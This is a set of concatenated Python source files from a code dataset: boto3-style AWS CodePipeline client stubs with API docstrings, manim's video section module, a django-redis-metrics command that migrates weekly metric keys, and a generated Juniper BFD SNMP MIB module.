's3Location': {
'bucketName': 'string',
'objectKey': 'string'
}
}
},
],
'outputArtifacts': [
{
'name': 'string',
'revision': 'string',
'location': {
'type': 'S3',
's3Location': {
'bucketName': 'string',
'objectKey': 'string'
}
}
},
],
'artifactCredentials': {
'accessKeyId': 'string',
'secretAccessKey': 'string',
'sessionToken': 'string'
},
'continuationToken': 'string',
'encryptionKey': {
'id': 'string',
'type': 'KMS'
}
},
'nonce': 'string'
}
}
:returns:
(string) --
(string) --
"""
pass
def get_waiter():
"""
"""
pass
def list_action_types(actionOwnerFilter=None, nextToken=None):
"""
Gets a summary of all AWS CodePipeline action types associated with your account.
See also: AWS API Documentation
:example: response = client.list_action_types(
actionOwnerFilter='AWS'|'ThirdParty'|'Custom',
nextToken='string'
)
:type actionOwnerFilter: string
:param actionOwnerFilter: Filters the list of action types to those created by a specified entity.
:type nextToken: string
:param nextToken: An identifier that was returned from the previous list action types call, which can be used to return the next set of action types in the list.
:rtype: dict
:return: {
'actionTypes': [
{
'id': {
'category': 'Source'|'Build'|'Deploy'|'Test'|'Invoke'|'Approval',
'owner': 'AWS'|'ThirdParty'|'Custom',
'provider': 'string',
'version': 'string'
},
'settings': {
'thirdPartyConfigurationUrl': 'string',
'entityUrlTemplate': 'string',
'executionUrlTemplate': 'string',
'revisionUrlTemplate': 'string'
},
'actionConfigurationProperties': [
{
'name': 'string',
'required': True|False,
'key': True|False,
'secret': True|False,
'queryable': True|False,
'description': 'string',
'type': 'String'|'Number'|'Boolean'
},
],
'inputArtifactDetails': {
'minimumCount': 123,
'maximumCount': 123
},
'outputArtifactDetails': {
'minimumCount': 123,
'maximumCount': 123
}
},
],
'nextToken': 'string'
}
"""
pass
def list_pipelines(nextToken=None):
"""
Gets a summary of all of the pipelines associated with your account.
See also: AWS API Documentation
:example: response = client.list_pipelines(
nextToken='string'
)
:type nextToken: string
:param nextToken: An identifier that was returned from the previous list pipelines call, which can be used to return the next set of pipelines in the list.
:rtype: dict
:return: {
'pipelines': [
{
'name': 'string',
'version': 123,
'created': datetime(2015, 1, 1),
'updated': datetime(2015, 1, 1)
},
],
'nextToken': 'string'
}
"""
pass
def poll_for_jobs(actionTypeId=None, maxBatchSize=None, queryParam=None):
"""
Returns information about any jobs for AWS CodePipeline to act upon.
See also: AWS API Documentation
:example: response = client.poll_for_jobs(
actionTypeId={
'category': 'Source'|'Build'|'Deploy'|'Test'|'Invoke'|'Approval',
'owner': 'AWS'|'ThirdParty'|'Custom',
'provider': 'string',
'version': 'string'
},
maxBatchSize=123,
queryParam={
'string': 'string'
}
)
:type actionTypeId: dict
:param actionTypeId: [REQUIRED]
Represents information about an action type.
category (string) -- [REQUIRED]A category defines what kind of action can be taken in the stage, and constrains the provider type for the action. Valid categories are limited to one of the values below.
owner (string) -- [REQUIRED]The creator of the action being called.
provider (string) -- [REQUIRED]The provider of the service being called by the action. Valid providers are determined by the action category. For example, an action in the Deploy category type might have a provider of AWS CodeDeploy, which would be specified as CodeDeploy.
version (string) -- [REQUIRED]A string that identifies the action type.
:type maxBatchSize: integer
:param maxBatchSize: The maximum number of jobs to return in a poll for jobs call.
:type queryParam: dict
:param queryParam: A map of property names and values. For an action type with no queryable properties, this value must be null or an empty map. For an action type with a queryable property, you must supply that property as a key in the map. Only jobs whose action configuration matches the mapped value will be returned.
(string) --
(string) --
:rtype: dict
:return: {
'jobs': [
{
'id': 'string',
'data': {
'actionTypeId': {
'category': 'Source'|'Build'|'Deploy'|'Test'|'Invoke'|'Approval',
'owner': 'AWS'|'ThirdParty'|'Custom',
'provider': 'string',
'version': 'string'
},
'actionConfiguration': {
'configuration': {
'string': 'string'
}
},
'pipelineContext': {
'pipelineName': 'string',
'stage': {
'name': 'string'
},
'action': {
'name': 'string'
}
},
'inputArtifacts': [
{
'name': 'string',
'revision': 'string',
'location': {
'type': 'S3',
's3Location': {
'bucketName': 'string',
'objectKey': 'string'
}
}
},
],
'outputArtifacts': [
{
'name': 'string',
'revision': 'string',
'location': {
'type': 'S3',
's3Location': {
'bucketName': 'string',
'objectKey': 'string'
}
}
},
],
'artifactCredentials': {
'accessKeyId': 'string',
'secretAccessKey': 'string',
'sessionToken': 'string'
},
'continuationToken': 'string',
'encryptionKey': {
'id': 'string',
'type': 'KMS'
}
},
'nonce': 'string',
'accountId': 'string'
},
]
}
:returns:
(string) --
(string) --
"""
pass
def poll_for_third_party_jobs(actionTypeId=None, maxBatchSize=None):
"""
Determines whether there are any third party jobs for a job worker to act on. Only used for partner actions.
See also: AWS API Documentation
:example: response = client.poll_for_third_party_jobs(
actionTypeId={
'category': 'Source'|'Build'|'Deploy'|'Test'|'Invoke'|'Approval',
'owner': 'AWS'|'ThirdParty'|'Custom',
'provider': 'string',
'version': 'string'
},
maxBatchSize=123
)
:type actionTypeId: dict
:param actionTypeId: [REQUIRED]
Represents information about an action type.
category (string) -- [REQUIRED]A category defines what kind of action can be taken in the stage, and constrains the provider type for the action. Valid categories are limited to one of the values below.
owner (string) -- [REQUIRED]The creator of the action being called.
provider (string) -- [REQUIRED]The provider of the service being called by the action. Valid providers are determined by the action category. For example, an action in the Deploy category type might have a provider of AWS CodeDeploy, which would be specified as CodeDeploy.
version (string) -- [REQUIRED]A string that identifies the action type.
:type maxBatchSize: integer
:param maxBatchSize: The maximum number of jobs to return in a poll for jobs call.
:rtype: dict
:return: {
'jobs': [
{
'clientId': 'string',
'jobId': 'string'
},
]
}
"""
pass
def put_action_revision(pipelineName=None, stageName=None, actionName=None, actionRevision=None):
"""
Provides information to AWS CodePipeline about new revisions to a source.
See also: AWS API Documentation
:example: response = client.put_action_revision(
pipelineName='string',
stageName='string',
actionName='string',
actionRevision={
'revisionId': 'string',
'revisionChangeId': 'string',
'created': datetime(2015, 1, 1)
}
)
:type pipelineName: string
:param pipelineName: [REQUIRED]
The name of the pipeline that will start processing the revision to the source.
:type stageName: string
:param stageName: [REQUIRED]
The name of the stage that contains the action that will act upon the revision.
:type actionName: string
:param actionName: [REQUIRED]
The name of the action that will process the revision.
:type actionRevision: dict
:param actionRevision: [REQUIRED]
Represents information about the version (or revision) of an action.
revisionId (string) -- [REQUIRED]The system-generated unique ID that identifies the revision number of the action.
revisionChangeId (string) -- [REQUIRED]The unique identifier of the change that set the state to this revision, for example a deployment ID or timestamp.
created (datetime) -- [REQUIRED]The date and time when the most recent version of the action was created, in timestamp format.
:rtype: dict
:return: {
'newRevision': True|False,
'pipelineExecutionId': 'string'
}
"""
pass
def put_approval_result(pipelineName=None, stageName=None, actionName=None, result=None, token=None):
"""
Provides the response to a manual approval request to AWS CodePipeline. Valid responses include Approved and Rejected.
See also: AWS API Documentation
:example: response = client.put_approval_result(
pipelineName='string',
stageName='string',
actionName='string',
result={
'summary': 'string',
'status': 'Approved'|'Rejected'
},
token='string'
)
:type pipelineName: string
:param pipelineName: [REQUIRED]
The name of the pipeline that contains the action.
:type stageName: string
:param stageName: [REQUIRED]
The name of the stage that contains the action.
:type actionName: string
:param actionName: [REQUIRED]
The name of the action for which approval is requested.
:type result: dict
:param result: [REQUIRED]
Represents information about the result of the approval request.
summary (string) -- [REQUIRED]The summary of the current status of the approval request.
status (string) -- [REQUIRED]The response submitted by a reviewer assigned to an approval action request.
:type token: string
:param token: [REQUIRED]
The system-generated token used to identify a unique approval request. The token for each open approval request can be obtained using the GetPipelineState action and is used to validate that the approval request corresponding to this token is still valid.
:rtype: dict
:return: {
'approvedAt': datetime(2015, 1, 1)
}
"""
pass
def put_job_failure_result(jobId=None, failureDetails=None):
"""
Represents the failure of a job as returned to the pipeline by a job worker. Only used for custom actions.
See also: AWS API Documentation
:example: response = client.put_job_failure_result(
jobId='string',
failureDetails={
'type': 'JobFailed'|'ConfigurationError'|'PermissionError'|'RevisionOutOfSync'|'RevisionUnavailable'|'SystemUnavailable',
'message': 'string',
'externalExecutionId': 'string'
}
)
:type jobId: string
:param jobId: [REQUIRED]
The unique system-generated ID of the job that failed. This is the same ID returned from PollForJobs.
:type failureDetails: dict
:param failureDetails: [REQUIRED]
The details about the failure of a job.
type (string) -- [REQUIRED]The type of the failure.
message (string) -- [REQUIRED]The message about the failure.
externalExecutionId (string) --The external ID of the run of the action that failed.
"""
pass
def put_job_success_result(jobId=None, currentRevision=None, continuationToken=None, executionDetails=None):
"""
Represents the success of a job as returned to the pipeline by a job worker. Only used for custom actions.
See also: AWS API Documentation
:example: response = client.put_job_success_result(
jobId='string',
currentRevision={
'revision': 'string',
'changeIdentifier': 'string',
'created': datetime(2015, 1, 1),
'revisionSummary': 'string'
},
continuationToken='string',
executionDetails={
'summary': 'string',
'externalExecutionId': 'string',
'percentComplete': 123
}
)
:type jobId: string
:param jobId: [REQUIRED]
The unique system-generated ID of the job that succeeded. This is the same ID returned from PollForJobs.
:type currentRevision: dict
:param currentRevision: The ID of the current revision of the artifact successfully worked upon by the job.
revision (string) -- [REQUIRED]The revision ID of the current version of an artifact.
changeIdentifier (string) -- [REQUIRED]The change identifier for the current revision.
created (datetime) --The date and time when the most recent revision of the artifact was created, in timestamp format.
revisionSummary (string) --The summary of the most recent revision of the artifact.
:type continuationToken: string
:param continuationToken: A token generated by a job worker, such as an AWS CodeDeploy deployment ID, that a successful job provides to identify a custom action in progress. Future jobs will use this token in order to identify the running instance of the action. It can be reused to return additional information about the progress of the custom action. When the action is complete, no continuation token should be supplied.
:type executionDetails: dict
:param executionDetails: The execution details of the successful job, such as the actions taken by the job worker.
summary (string) --The summary of the current status of the actions.
externalExecutionId (string) --The system-generated unique ID of this action used to identify this job worker in any external systems, such as AWS CodeDeploy.
percentComplete (integer) --The percentage of work completed on the action, represented on a scale of zero to one hundred percent.
"""
pass
def put_third_party_job_failure_result(jobId=None, clientToken=None, failureDetails=None):
"""
Represents the failure of a third party job as returned to the pipeline by a job worker. Only used for partner actions.
See also: AWS API Documentation
:example: response = client.put_third_party_job_failure_result(
jobId='string',
clientToken='string',
failureDetails={
'type': 'JobFailed'|'ConfigurationError'|'PermissionError'|'RevisionOutOfSync'|'RevisionUnavailable'|'SystemUnavailable',
'message': 'string',
'externalExecutionId': 'string'
}
)
:type jobId: string
:param jobId: [REQUIRED]
The ID of the job that failed. This is the same ID returned from PollForThirdPartyJobs.
:type clientToken: string
:param clientToken: [REQUIRED]
The clientToken portion of the clientId and clientToken pair used to verify that the calling entity is allowed access to the job and its details.
:type failureDetails: dict
:param failureDetails: [REQUIRED]
Represents information about failure details.
type (string) -- [REQUIRED]The type of the failure.
message (string) -- [REQUIRED]The message about the failure.
externalExecutionId (string) --The external ID of the run of the action that failed.
"""
pass
def put_third_party_job_success_result(jobId=None, clientToken=None, currentRevision=None, continuationToken=None, executionDetails=None):
"""
Represents the success of a third party job as returned to the pipeline by a job worker. Only used for partner actions.
See also: AWS API Documentation
:example: response = client.put_third_party_job_success_result(
jobId='string',
clientToken='string',
currentRevision={
'revision': 'string',
'changeIdentifier': 'string',
'created': datetime(2015, 1, 1),
'revisionSummary': 'string'
},
continuationToken='string',
executionDetails={
'summary': 'string',
'externalExecutionId': 'string',
'percentComplete': 123
}
)
:type jobId: string
:param jobId: [REQUIRED]
The ID of the job that successfully completed. This is the same ID returned from PollForThirdPartyJobs.
:type clientToken: string
:param clientToken: [REQUIRED]
The clientToken portion of the clientId and clientToken pair used to verify that the calling entity is allowed access to the job and its details.
:type currentRevision: dict
:param currentRevision: Represents information about a current revision.
revision (string) -- [REQUIRED]The revision ID of the current version of an artifact.
changeIdentifier (string) -- [REQUIRED]The change identifier for the current revision.
created (datetime) --The date and time when the most recent revision of the artifact was created, in timestamp format.
revisionSummary (string) --The summary of the most recent revision of the artifact.
:type continuationToken: string
:param continuationToken: A token generated by a job worker, such as an AWS CodeDeploy deployment ID, that a successful job provides to identify a partner action in progress. Future jobs will use this token in order to identify the running instance of the action. It can be reused to return additional information about the progress of the partner action. When the action is complete, no continuation token should be supplied.
:type executionDetails: dict
:param executionDetails: The details of the actions taken and results produced on an artifact as it passes through stages in the pipeline.
summary (string) --The summary of the current status of the actions.
externalExecutionId (string) --The system-generated unique ID of this action used to identify this job worker in any external systems, such as AWS CodeDeploy.
percentComplete (integer) --The percentage of work completed on the action, represented on a scale of zero to one hundred percent.
"""
pass
def retry_stage_execution(pipelineName=None, stageName=None, pipelineExecutionId=None, retryMode=None):
"""
Resumes the pipeline execution by retrying the last failed actions in a stage.
See also: AWS API Documentation
:example: response = client.retry_stage_execution(
pipelineName='string',
stageName='string',
pipelineExecutionId='string',
retryMode='FAILED_ACTIONS'
)
:type pipelineName: string
:param pipelineName: [REQUIRED]
The name of the pipeline that contains the failed stage.
:type stageName: string
:param stageName: [REQUIRED]
The name of the failed stage to be retried.
:type pipelineExecutionId: string
:param pipelineExecutionId: [REQUIRED]
The ID of the pipeline execution in the failed stage to be retried. Use the GetPipelineState action to retrieve the current pipelineExecutionId of the failed stage
:type retryMode: string
:param retryMode: [REQUIRED]
The scope of the retry attempt. Currently, the only supported value is FAILED_ACTIONS.
:rtype: dict
:return: {
'pipelineExecutionId': 'string'
}
"""
pass
def start_pipeline_execution(name=None):
"""
Starts the specified pipeline. Specifically, it begins processing the latest commit to the source location specified as part of the pipeline.
See also: AWS API Documentation
:example: response = client.start_pipeline_execution(
name='string'
)
:type name: string
:param name: [REQUIRED]
The name of the pipeline to start.
:rtype: dict
:return: {
'pipelineExecutionId': 'string'
}
"""
pass
def update_pipeline(pipeline=None):
"""
Updates a specified pipeline with edits or changes to its structure. Use a JSON file with the pipeline structure in conjunction with UpdatePipeline to provide the full structure of the pipeline. Updating the pipeline increases the version number of the pipeline by 1.
See also: AWS API Documentation
:example: response = client.update_pipeline(
pipeline={
'name': 'string',
'roleArn': 'string',
'artifactStore': {
'type': 'S3',
'location': 'string',
'encryptionKey': {
'id': 'string',
'type': 'KMS'
}
},
'stages': [
{
'name': 'string',
'blockers': [
{
'name': 'string',
'type': 'Schedule'
},
],
'actions': [
{
'name': 'string',
'actionTypeId': {
'category': 'Source'|'Build'|'Deploy'|'Test'|'Invoke'|'Approval',
'owner': 'AWS'|'ThirdParty'|'Custom',
'provider': 'string',
'version': 'string'
},
'runOrder': 123,
'configuration': {
'string': 'string'
},
'outputArtifacts': [
{
'name': 'string'
},
],
'inputArtifacts': [
{
'name': 'string'
},
],
'roleArn': 'string'
},
]
},
],
'version': 123
}
)
:type pipeline: dict
:param pipeline: [REQUIRED]
The name of the pipeline to be updated.
name (string) -- [REQUIRED]The name of the action to be performed.
roleArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) for AWS CodePipeline to use to either perform actions with no actionRoleArn, or to use to assume roles for actions with an actionRoleArn.
artifactStore (dict) -- [REQUIRED]The Amazon S3 location where artifacts are stored for the pipeline. If this Amazon S3 bucket is created manually, it must meet the requirements for AWS CodePipeline. For more information, see the Concepts .
type (string) -- [REQUIRED]The type of the artifact store, such as S3.
location (string) -- [REQUIRED]The location for storing the artifacts for a pipeline, such as an S3 bucket or folder.
encryptionKey (dict) --The encryption key used to encrypt the data in the artifact store, such as an AWS Key Management Service (AWS KMS) key. If this is undefined, the default key for Amazon S3 is used.
id (string) -- [REQUIRED]The ID used to identify the key. For an AWS KMS key, this is the key ID or key ARN.
type (string) -- [REQUIRED]The type of encryption key, such as an AWS Key Management Service (AWS KMS) key. When creating or updating a pipeline, the value must be set to 'KMS'.
stages (list) -- [REQUIRED]The stage in which to perform the action.
(dict) --Represents information about a stage and its definition.
name (string) -- [REQUIRED]The name of the stage.
blockers (list) --Reserved for future use.
(dict) --Reserved for future use.
name (string) -- [REQUIRED]Reserved for future use.
type (string) -- [REQUIRED]Reserved for future use.
actions (list) -- [REQUIRED]The actions included in a stage.
(dict) --Represents information about an action declaration.
name (string) -- [REQUIRED]The action declaration's name.
actionTypeId (dict) -- [REQUIRED]The configuration information for the action type.
category (string) -- [REQUIRED]A category defines what kind of action can be taken in the stage, and constrains the provider type for the action. Valid categories are limited to one of the values below.
owner (string) -- [REQUIRED]The creator of the action being called.
provider (string) -- [REQUIRED]The provider of the service being called by the action. Valid providers are determined by the action category. For example, an action in the Deploy category type might have a provider of AWS CodeDeploy, which would be specified as CodeDeploy.
version (string) -- [REQUIRED]A string that identifies the action type.
runOrder (integer) --The order in which actions are run.
configuration (dict) --The action declaration's configuration.
(string) --
(string) --
outputArtifacts (list) --The name or ID of the result of the action declaration, such as a test or build artifact.
(dict) --Represents information about the output of an action.
name (string) -- [REQUIRED]The name of the output of an artifact, such as 'My App'.
The input artifact of an action must exactly match the output artifact declared in a preceding action, but the input artifact does not have to be the next action in strict sequence from the action that provided the output artifact. Actions in parallel can declare different output artifacts, which are in turn consumed by different following actions.
Output artifact names must be unique within a pipeline.
inputArtifacts (list) --The name or ID of the artifact consumed by the action, such as a test or build artifact.
(dict) --Represents information about an artifact to be worked on, such as a test or build artifact.
name (string) -- [REQUIRED]The name of the artifact to be worked on, for example, 'My App'.
The input artifact of an action must exactly match the output artifact declared in a preceding action, but the input artifact does not have to be the next action in strict sequence from the action that provided the output artifact. Actions in parallel can declare different output artifacts, which are in turn consumed by different following actions.
roleArn (string) --The ARN of the IAM service role that will perform the declared action. This is assumed through the roleArn for the pipeline.
version (integer) --The version number of the pipeline. A new pipeline always has a version number of 1. This number is automatically incremented when a pipeline is updated.
:rtype: dict
:return: {
'pipeline': {
'name': 'string',
'roleArn': 'string',
'artifactStore': {
'type': 'S3',
'location': 'string',
'encryptionKey': {
'id': 'string',
'type': 'KMS'
}
},
'stages': [
{
'name': 'string',
'blockers': [
{
'name': 'string',
'type': 'Schedule'
},
],
'actions': [
{
'name': 'string',
'actionTypeId': {
'category': 'Source'|'Build'|'Deploy'|'Test'|'Invoke'|'Approval',
'owner': 'AWS'|'ThirdParty'|'Custom',
'provider': 'string',
'version': 'string'
},
'runOrder': 123,
'configuration': {
'string': 'string'
},
'outputArtifacts': [
{
'name': 'string'
},
],
'inputArtifacts': [
{
'name': 'string'
},
],
'roleArn': 'string'
},
]
},
],
'version': 123
}
}
:returns:
(string) --
(string) --
"""
pass
| 39.642202 | 430 | 0.538475 |
795c80061120a94b89c5851eaf6605833294608f | 81 | py | Python | tests/__init__.py | UofU-Cryosphere/weather_forecast_retrieval | b06fe2e09b49ace9eba55bf424c1b2d1e358858c | [
"CC0-1.0"
] | 6 | 2017-12-20T22:42:24.000Z | 2021-08-07T03:32:27.000Z | tests/__init__.py | UofU-Cryosphere/weather_forecast_retrieval | b06fe2e09b49ace9eba55bf424c1b2d1e358858c | [
"CC0-1.0"
] | 26 | 2019-03-07T17:47:13.000Z | 2021-06-25T15:43:27.000Z | tests/__init__.py | UofU-Cryosphere/weather_forecast_retrieval | b06fe2e09b49ace9eba55bf424c1b2d1e358858c | [
"CC0-1.0"
] | 3 | 2019-03-08T07:28:59.000Z | 2021-02-12T21:59:12.000Z | # -*- coding: utf-8 -*-
"""Unit test package for weather_forecast_retrieval."""
| 20.25 | 55 | 0.666667 |
795c803ae35193ebd2ce7bd865cbe5f65cc447ce | 3,644 | py | Python | manim/scene/section.py | dianechae/manim | 269e5c22cb02de108579eccee2b82583eb71e3dc | [
"MIT"
] | 1 | 2021-10-17T15:43:51.000Z | 2021-10-17T15:43:51.000Z | manim/scene/section.py | dianechae/manim | 269e5c22cb02de108579eccee2b82583eb71e3dc | [
"MIT"
] | null | null | null | manim/scene/section.py | dianechae/manim | 269e5c22cb02de108579eccee2b82583eb71e3dc | [
"MIT"
] | null | null | null | """building blocks of segmented video API"""
from __future__ import annotations
import os
from enum import Enum
from typing import Any, Dict, List, Optional
from manim import get_video_metadata
class DefaultSectionType(str, Enum):
"""The type of a section can be used for third party applications.
A presentation system could for example use the types to created loops.
Examples
--------
This class can be reimplemented for more types::
class PresentationSectionType(str, Enum):
# start, end, wait for continuation by user
NORMAL = "presentation.normal"
# start, end, immediately continue to next section
SKIP = "presentation.skip"
# start, end, restart, immediately continue to next section when continued by user
LOOP = "presentation.loop"
# start, end, restart, finish animation first when user continues
COMPLETE_LOOP = "presentation.complete_loop"
"""
NORMAL = "default.normal"
class Section:
"""A :class:`.Scene` can be segmented into multiple Sections.
Refer to :doc:`the documentation</tutorials/a_deeper_look>` for more info.
It consists of multiple animations.
Attributes
----------
type
Can be used by a third party applications to classify different types of sections.
video
Path to video file with animations belonging to section relative to sections directory.
If ``None``, then the section will not be saved.
name
Human readable, non-unique name for this section.
skip_animations
Skip rendering the animations in this section when ``True``.
partial_movie_files
Animations belonging to this section.
See Also
--------
:class:`.DefaultSectionType`
:meth:`.CairoRenderer.update_skipping_status`
:meth:`.OpenGLRenderer.update_skipping_status`
"""
def __init__(self, type: str, video: str | None, name: str, skip_animations: bool):
self.type = type
# None when not to be saved -> still keeps section alive
self.video: str | None = video
self.name = name
self.skip_animations = skip_animations
self.partial_movie_files: list[str | None] = []
def is_empty(self) -> bool:
"""Check whether this section is empty.
Note that animations represented by ``None`` are also counted.
"""
return len(self.partial_movie_files) == 0
def get_clean_partial_movie_files(self) -> list[str]:
"""Return all partial movie files that are not ``None``."""
return [el for el in self.partial_movie_files if el is not None]
def get_dict(self, sections_dir: str) -> dict[str, Any]:
"""Get dictionary representation with metadata of output video.
The output from this function is used from every section to build the sections index file.
The output video must have been created in the ``sections_dir`` before executing this method.
This is the main part of the Segmented Video API.
"""
if self.video is None:
raise ValueError(
f"Section '{self.name}' cannot be exported as dict, it does not have a video path assigned to it"
)
video_metadata = get_video_metadata(os.path.join(sections_dir, self.video))
return dict(
{
"name": self.name,
"type": self.type,
"video": self.video,
},
**video_metadata,
)
def __repr__(self):
return f"<Section '{self.name}' stored in '{self.video}'>"
| 35.378641 | 113 | 0.642975 |
795c824e7ec1d604bd9ae1e219321a9ae8dc8c85 | 1,835 | py | Python | redis_metrics/management/commands/reset_weekly_metrics.py | sporteasy/django-redis-metrics | 8f3d55651c3e2c1dff1aa1d96d04ddc7e9e5680e | [
"MIT"
] | 1 | 2019-02-10T19:33:41.000Z | 2019-02-10T19:33:41.000Z | redis_metrics/management/commands/reset_weekly_metrics.py | sporteasy/django-redis-metrics | 8f3d55651c3e2c1dff1aa1d96d04ddc7e9e5680e | [
"MIT"
] | null | null | null | redis_metrics/management/commands/reset_weekly_metrics.py | sporteasy/django-redis-metrics | 8f3d55651c3e2c1dff1aa1d96d04ddc7e9e5680e | [
"MIT"
] | null | null | null | import re
from datetime import date
from django.core.management.base import BaseCommand, CommandError
from redis_metrics.models import R
class Command(BaseCommand):
"""
Updates the weekly metrics so they use the new key format. For
more information, see Issue #7: http://bit.ly/YEjtF9
Essentially, weekly-aggregated metrics had a key of the form:
m:<slug>:w:<nn>
Where ``nn`` was the week number in the range: [00-52). They now take the
form:
m:<slug>:w:<yyyy-nn>
Where ``yyyy`` is a 4-digit year, and ``nn`` is the week number.
"""
args = '[year]'
help = "Updates weekly metrics so they match the new key format"
def handle(self, *args, **options):
if len(args) == 0:
# Use the current year
year = date.today().year
elif len(args) == 1:
year = int(args[0])
else:
raise CommandError("Invalid arguments. Provide a 4-digit year.")
r = R()
# Retrieve all the metric keys of the form: "m:<slug>:w:<nn>"
weekly_keys = filter(
lambda k: re.match(r'^m:.+:w:\d\d', k) is not None,
r.r.smembers(r._metric_slugs_key)
)
for old_key in weekly_keys:
# Match -> m:<slug>:w:<nn>
# Replace -> m:<slug>:w:<yyyy-nn>
parts = old_key.split(":")
parts[-1] = "{0}-{1}".format(year, parts[-1])
new_key = ":".join(parts)
# Copy old metric value into new metric
r.r.set(new_key, r.r.get(old_key))
# Track the new key
r.r.sadd(r._metric_slugs_key, new_key)
# Delete the old metric?
r.r.delete(old_key)
# Delete the set of keys for the old weekly metrics
r.r.srem(r._metric_slugs_key, *weekly_keys)
| 29.126984 | 77 | 0.565668 |
795c842caee13836bb4b2a7c3e6e94488f62b031 | 4,957 | py | Python | pysnmp/JUNIPER-BFD-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 11 | 2021-02-02T16:27:16.000Z | 2021-08-31T06:22:49.000Z | pysnmp/JUNIPER-BFD-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 75 | 2021-02-24T17:30:31.000Z | 2021-12-08T00:01:18.000Z | pysnmp/JUNIPER-BFD-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module JUNIPER-BFD-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/JUNIPER-BFD-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 19:47:55 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, OctetString, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "Integer", "OctetString", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsUnion, ValueSizeConstraint, ValueRangeConstraint, SingleValueConstraint, ConstraintsIntersection = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsUnion", "ValueSizeConstraint", "ValueRangeConstraint", "SingleValueConstraint", "ConstraintsIntersection")
bfdSessIndex, = mibBuilder.importSymbols("BFD-STD-MIB", "bfdSessIndex")
jnxBfdMibRoot, = mibBuilder.importSymbols("JUNIPER-SMI", "jnxBfdMibRoot")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
Counter32, NotificationType, iso, ObjectIdentity, TimeTicks, Gauge32, Counter64, ModuleIdentity, MibScalar, MibTable, MibTableRow, MibTableColumn, MibIdentifier, Integer32, IpAddress, Unsigned32, Bits = mibBuilder.importSymbols("SNMPv2-SMI", "Counter32", "NotificationType", "iso", "ObjectIdentity", "TimeTicks", "Gauge32", "Counter64", "ModuleIdentity", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "MibIdentifier", "Integer32", "IpAddress", "Unsigned32", "Bits")
TimeStamp, TextualConvention, DisplayString, TruthValue = mibBuilder.importSymbols("SNMPv2-TC", "TimeStamp", "TextualConvention", "DisplayString", "TruthValue")
jnxBfdMib = ModuleIdentity((1, 3, 6, 1, 4, 1, 2636, 3, 45, 1))
jnxBfdMib.setRevisions(('2006-10-12 12:00',))
if mibBuilder.loadTexts: jnxBfdMib.setLastUpdated('200610121200Z')
if mibBuilder.loadTexts: jnxBfdMib.setOrganization('IETF')
jnxBfdNotification = MibIdentifier((1, 3, 6, 1, 4, 1, 2636, 3, 45, 1, 0))
jnxBfdObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 2636, 3, 45, 1, 1))
jnxBfdNotifyObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 2636, 3, 45, 1, 2))
jnxBfdSessTable = MibTable((1, 3, 6, 1, 4, 1, 2636, 3, 45, 1, 1, 1), )
if mibBuilder.loadTexts: jnxBfdSessTable.setStatus('current')
jnxBfdSessEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2636, 3, 45, 1, 1, 1, 1), ).setIndexNames((0, "BFD-STD-MIB", "bfdSessIndex"))
if mibBuilder.loadTexts: jnxBfdSessEntry.setStatus('current')
jnxBfdSessThreshTxInterval = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 45, 1, 1, 1, 1, 1), Unsigned32()).setUnits('microseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxBfdSessThreshTxInterval.setStatus('current')
jnxBfdSessCurrTxInterval = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 45, 1, 1, 1, 1, 2), Unsigned32()).setUnits('microseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxBfdSessCurrTxInterval.setStatus('current')
jnxBfdSessThreshDectTime = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 45, 1, 1, 1, 1, 3), Unsigned32()).setUnits('microseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxBfdSessThreshDectTime.setStatus('current')
jnxBfdSessCurrDectTime = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 45, 1, 1, 1, 1, 4), Unsigned32()).setUnits('microseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxBfdSessCurrDectTime.setStatus('current')
jnxBfdSessIntfName = MibTableColumn((1, 3, 6, 1, 4, 1, 2636, 3, 45, 1, 1, 1, 1, 5), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxBfdSessIntfName.setStatus('current')
jnxBfdSessifName = MibScalar((1, 3, 6, 1, 4, 1, 2636, 3, 45, 1, 2, 1), DisplayString()).setMaxAccess("accessiblefornotify")
if mibBuilder.loadTexts: jnxBfdSessifName.setStatus('current')
jnxBfdSessTxIntervalHigh = NotificationType((1, 3, 6, 1, 4, 1, 2636, 3, 45, 1, 0, 1)).setObjects(("JUNIPER-BFD-MIB", "jnxBfdSessThreshTxInterval"), ("JUNIPER-BFD-MIB", "jnxBfdSessCurrTxInterval"))
if mibBuilder.loadTexts: jnxBfdSessTxIntervalHigh.setStatus('current')
jnxBfdSessDetectionTimeHigh = NotificationType((1, 3, 6, 1, 4, 1, 2636, 3, 45, 1, 0, 2)).setObjects(("JUNIPER-BFD-MIB", "jnxBfdSessThreshDectTime"), ("JUNIPER-BFD-MIB", "jnxBfdSessCurrDectTime"))
if mibBuilder.loadTexts: jnxBfdSessDetectionTimeHigh.setStatus('current')
